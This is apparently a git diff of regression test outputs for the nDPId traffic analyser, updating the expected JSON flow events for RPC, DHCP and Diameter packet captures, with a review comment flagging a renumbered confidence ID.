01727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1602860710012,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":995,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":995,"pkt_l4_len":961,"thread_ts_msec":1602860710012,"pkt":"AA7wSJ4FABwGCybtCABFAAPVAX8AAB4RFCrAqAELwKgBFMADiJQDwWYXBAAgAAAAAADeoAAAbJcR0YJxAAEBAQFN3qAAAWyXEdGCcQCgJELffTX9qQA1ihISgAQAHAYLJu0AAAAAAAAAAQAAAAEAA\/\/\/\/\/8DaQAAAAAAAANVAAADVQAAA1UAAAAAAAADVQAIADwBAAAACfGlMMdfbUe2f4BzQ53qrf\/\/\/\/\/\/\/\/\/\/AADgQAAAAxUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAA8AQAAAQnxpTDHX21Htn+Ac0Od6q0AAAAAAAAAAQAAAAEAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIQAfADEAAAAACAA8AQAAAgnxpTDHX21Htn+Ac0Od6q0AAAAAAACAAAAAgFEAAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAhMAGAEAAADD1of+eJ4Doazb5b\/LvCe2AAAAAAAIADwBAAADCfGlMMdfbUe2f4BzQ53qrQAAAAAAAIAAAACAUgAAACgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACEQAkAQAAAMPWh\/54ngOhrNvlv8u8J7YAAAAAC21ycGRvbWFpbi0xAAgAPAEAAAQJ8aUwx19tR7Z\/gHNDneqtAAAAAAACAAEAAAABAAAACgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEABwdRAAAAAAAAAAAIADwBAAAFCfGlMMdfbUe2f4BzQ53qrQAAAAAAAgABAAAAAgAAAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBgEA\/wAAAAAIADwBAAAGCfGlMMdfbUe2f4BzQ53qrQAAAAAAAgABAAAAAwAAAAkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASAQEBAQEBAQEAAAAACAA8AQAABwnxpTDHX21Htn+Ac0Od6q0AAAAAAAMAAQAAAAEAAAAKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAHAVEAAAAAAAAAAAgAPAEAAAgJ8aUwx19tR7Z\/gHNDneqtAAAAAAADAAEAAAACAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEGAQD\/AAAAAAgAPAEAAAkJ8aUwx19tR7Z\/gHNDneqtAAAAAAAEAAEAAAABAAAACgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEABgQAAAAAAP8AAAAIADwBAAAKCfGlMMdfbUe2f4BzQ53qrQAAAAAABAABAAAAAgAAAAkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASAQEBAQEBAQE="} 
01524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1602860710024,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":846,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":846,"pkt_l4_len":812,"thread_ts_msec":1602860710024,"pkt":"ABwGCybtAA7wSJ4FCABFAANAAAYAAB4RFjjAqAEUwKgBC8AJwAMDLC54BAIKABAAAAAAAKDel2zREYJxAAEBAQFNAQCg3pds0RGCcQCgJELffQCp\/TWKNRISgAQAHAYLJu0AAAAAAQAAAAEAAAADAP\/\/\/\/\/UAgAAAAAAAAAAwAIAAFUDAAAAAAAAwAIAAIAIADwBAAAACfGlMMdfbUe2f4BzQ53qrf\/\/\/\/\/\/\/\/\/\/AADgQAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACACAA8AQAAAQnxpTDHX21Htn+Ac0Od6q0AAAAAAAAAAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAgAPAEAAAIJ8aUwx19tR7Z\/gHNDneqtAAAAAAAAgAAAAIBRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAIADwBAAADCfGlMMdfbUe2f4BzQ53qrQAAAAAAAIAAAACAUgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACACAA8AQAABAnxpTDHX21Htn+Ac0Od6q0AAAAAAAIAAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAgAPAEAAAUJ8aUwx19tR7Z\/gHNDneqtAAAAAAACAAEAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAIADwBAAAGCfGlMMdfbUe2f4BzQ53qrQAAAAAAAgABAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACACAA8AQAABwnxpTDHX21Htn+Ac0Od6q0AAAAAAAMAAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAgAPAEAAAgJ8aUwx19tR7Z\/gHNDneqtAAAAAAADAAEAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAIADwBAAAJCfGlMMdfbUe2f4BzQ53qrQAAAAAABAABAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACACAA8AQAACgnxpTDHX21Htn+Ac0Od6q0AAAAAAAQAAQAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860710063,"flow_last_seen":1602860710063,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1602860710063,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49162,"dst_port":34964,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1602860710063,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1602860710063,"pkt":"ABwGCybtAA7wSJ4FCABFAACgAAgAAB4RGNbAqAEUwKgBC8AKiJQAjEB6BAAgABAAAAAAAKDel2zREYJxAGQBDQAqAgCg3pds0RGCcQCgJELffYDI+0MAABAQgAAADvBIngUAAAAAAQAAAAAAAAAEAP\/\/\/\/80AAAAAACgAAAAIAAAAKAAAAAAAAAAIAAAAAESABwBAAAACfGlMMdfbUe2f4BzQ53qrQACAAAAAgAA"} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860710063,"flow_last_seen":1602860710063,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1602860710063,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49162,"dst_port":34964,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} 
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860710063,"flow_last_seen":1602860710063,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1602860710063,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49162,"dst_port":34964,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1602860710063,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1602860710063,"pkt":"ABwGCybtAA7wSJ4FCABFAACgAAgAAB4RGNbAqAEUwKgBC8AKiJQAjEB6BAAgABAAAAAAAKDel2zREYJxAGQBDQAqAgCg3pds0RGCcQCgJELffYDI+0MAABAQgAAADvBIngUAAAAAAQAAAAAAAAAEAP\/\/\/\/80AAAAAACgAAAAIAAAAKAAAAAAAAAAIAAAAAESABwBAAAACfGlMMdfbUe2f4BzQ53qrQACAAAAAgAA"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860710071,"flow_last_seen":1602860710071,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49154,"dst_port":49162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1602860710071,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1602860710071,"pkt":"AA7wSJ4FABwGCybtCABFAACgAYEAAB4RF13AqAELwKgBFMACwAoAjHUlBAIKAAAAAADeoAAAbJcR0YJxAGQBDQAq3qAAAmyXEdGCcQCgJELffUP7yIAAABAQgAAADvBIngUAJ7vVAAAAAQAAAAAABP\/\/\/\/8ANAAAAAAAAAAAAAAAIAAAAKAAAAAAAAAAIIESABwBAAAACfGlMMdfbUe2f4BzQ53qrQACAAAACAAA"} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860710071,"flow_last_seen":1602860710071,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49154,"dst_port":49162,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860710071,"flow_last_seen":1602860710071,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49154,"dst_port":49162,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} 
00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1602860710071,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1602860710071,"pkt":"AA7wSJ4FABwGCybtCABFAACgAYEAAB4RF13AqAELwKgBFMACwAoAjHUlBAIKAAAAAADeoAAAbJcR0YJxAGQBDQAq3qAAAmyXEdGCcQCgJELffUP7yIAAABAQgAAADvBIngUAJ7vVAAAAAQAAAAAABP\/\/\/\/8ANAAAAAAAAAAAAAAAIAAAAKAAAAAAAAAAIIESABwBAAAACfGlMMdfbUe2f4BzQ53qrQACAAAACAAA"} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1602860710071,"flow_last_seen":1602860710071,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49154,"dst_port":49162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1602860709993,"flow_last_seen":1602860710062,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":804,"flow_tot_l4_payload_len":2212,"flow_avg_l4_payload_len":368,"midstream":0,"thread_ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49161,"dst_port":49155,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} 
-00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1602860709979,"flow_last_seen":1602860710032,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":953,"flow_tot_l4_payload_len":3454,"flow_avg_l4_payload_len":575,"midstream":0,"thread_ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49155,"dst_port":34964,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1602860710063,"flow_last_seen":1602860710063,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49162,"dst_port":34964,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1602860710071,"flow_last_seen":1602860710071,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49154,"dst_port":49162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1602860709993,"flow_last_seen":1602860710062,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":804,"flow_tot_l4_payload_len":2212,"flow_avg_l4_payload_len":368,"midstream":0,"thread_ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49161,"dst_port":49155,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1602860709979,"flow_last_seen":1602860710032,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":953,"flow_tot_l4_payload_len":3454,"flow_avg_l4_payload_len":575,"midstream":0,"thread_ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49155,"dst_port":34964,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} 
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1602860710063,"flow_last_seen":1602860710063,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49162,"dst_port":34964,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":16,"total-skipped-flows":0,"total-l4-payload-len":6194,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":25,"global_ts_msec":1602860710071} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 16/16 @@ -31,9 +31,9 @@ ~~ total active/idle flows...: 4/4 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5873087 bytes -~~ total memory freed........: 5873087 bytes -~~ total allocations/frees...: 118142/118142 +~~ total memory allocated....: 6006721 bytes +~~ total memory freed........: 6006721 bytes +~~ total allocations/frees...: 120904/120904 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 1732 chars diff --git a/test/results/dhcp-fuzz.pcapng.out b/test/results/dhcp-fuzz.pcapng.out index 9f90cd78f..9ad1e0530 100644 
--- a/test/results/dhcp-fuzz.pcapng.out +++ b/test/results/dhcp-fuzz.pcapng.out @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869444 bytes -~~ total memory freed........: 5869444 bytes -~~ total allocations/frees...: 118114/118114 +~~ total memory allocated....: 6003078 bytes +~~ total memory freed........: 6003078 bytes +~~ total allocations/frees...: 120876/120876 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 467 chars ~~ json string max len.......: 857 chars diff --git a/test/results/diameter.pcap.out b/test/results/diameter.pcap.out index 7bac3f5a5..fab54cb16 100644 --- a/test/results/diameter.pcap.out +++ b/test/results/diameter.pcap.out 
@@ -2,10 +2,10 @@ 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1263278878271} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1263278878271,"flow_last_seen":1263278878271,"flow_idle_time":7580000,"flow_min_l4_payload_len":344,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":344,"midstream":1,"thread_ts_msec":1263278878271,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00912{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1263278878271,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":398,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":398,"pkt_l4_len":364,"thread_ts_msec":1263278878271,"pkt":"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"} 
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1263278878271,"flow_last_seen":1263278878271,"flow_idle_time":7580000,"flow_min_l4_payload_len":344,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":344,"midstream":1,"thread_ts_msec":1263278878271,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Diameter","breed":"Acceptable","category":"Network"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1263278878271,"flow_last_seen":1263278878271,"flow_idle_time":7580000,"flow_min_l4_payload_len":344,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":344,"midstream":1,"thread_ts_msec":1263278878271,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Diameter","breed":"Acceptable","category":"Network"}} 
00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1263278878292,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":290,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":290,"pkt_l4_len":256,"thread_ts_msec":1263278878292,"pkt":"ACYYlIbAABpk3ZWLCABFAAEUlYlAAEAGe8kKyQkLCskJ9Q8cxw34vC+Q9+H8DlAYGSCUIQAAAQAA7EAAARAAAAAEAupJMCbwAAMAAAEHQAAAHW54bDthcGk7MTI2MzI3ODg3ODE0NwAAAAAAAQxAAAAMAAAH0QAAAQhAAAAaZHNsdTEuY29tdmVyc2UuY29tAAAAAAEoQAAAFGNvbXZlcnNlLmNvbQAAAQJAAAAMAAAABAAAAaBAAAAMAAAAAQAAAZ9AAAAMAAAAAAAAARZAAAAMAABBbQAAADdAAAAMzvaZ5QAAAcBAAAAMAAAABQAAAa9AAAA0AAABnUAAACwAAAG9QAAAGAAAAb9AAAAQAAAAAAAAAAIAAAGpQAAADAAAAWQ="} 00933{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1263278878336,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":414,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":414,"pkt_l4_len":380,"thread_ts_msec":1263278878336,"pkt":"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\/QAAAEAAAAAAAAAABAAABqUAAAAwAAAFk"} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1263278878271,"flow_last_seen":1263278878357,"flow_idle_time":7580000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":1,"thread_ts_msec":1263278878357,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Diameter","breed":"Acceptable","category":"Network"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1263278878271,"flow_last_seen":1263278878357,"flow_idle_time":7580000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":1,"thread_ts_msec":1263278878357,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Diameter","breed":"Acceptable","category":"Network"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"diameter.pcap","alias":"nDPId-test","packets-captured":6,"packets-processed":6,"total-skipped-flows":0,"total-l4-payload-len":1656,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1263278878357} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6/6 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869617 bytes -~~ total memory freed........: 5869617 bytes -~~ total allocations/frees...: 118120/118120 +~~ total memory allocated....: 6003251 bytes +~~ total memory freed........: 6003251 bytes +~~ total allocations/frees...: 120882/120882 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 938 chars diff --git a/test/results/discord.pcap.out b/test/results/discord.pcap.out index 9b466de3f..e2e6b8cca 100644 
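Review bot: The key inside `ndpi.confidence` moves from `"4"` to `"6"` for the unchanged value `"DPI"` in the `detected` and `idle` events of this hunk, and the commit description does not mention it. The same shift is visible in the dcerpc, discord and dnp3 results, so it looks like a renumbering of the confidence enum that came in with the libnDPI bump (inferred; the library change itself is not shown here). Any consumer of the JSON stream that filters or alerts on the numeric key rather than on the name would stop matching without an error. I would record this in the commit description, for example `ndpi.confidence ids changed (DPI: 4 -> 6); consumers should match on the name, not the id`.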
--- a/test/results/discord.pcap.out +++ b/test/results/discord.pcap.out 
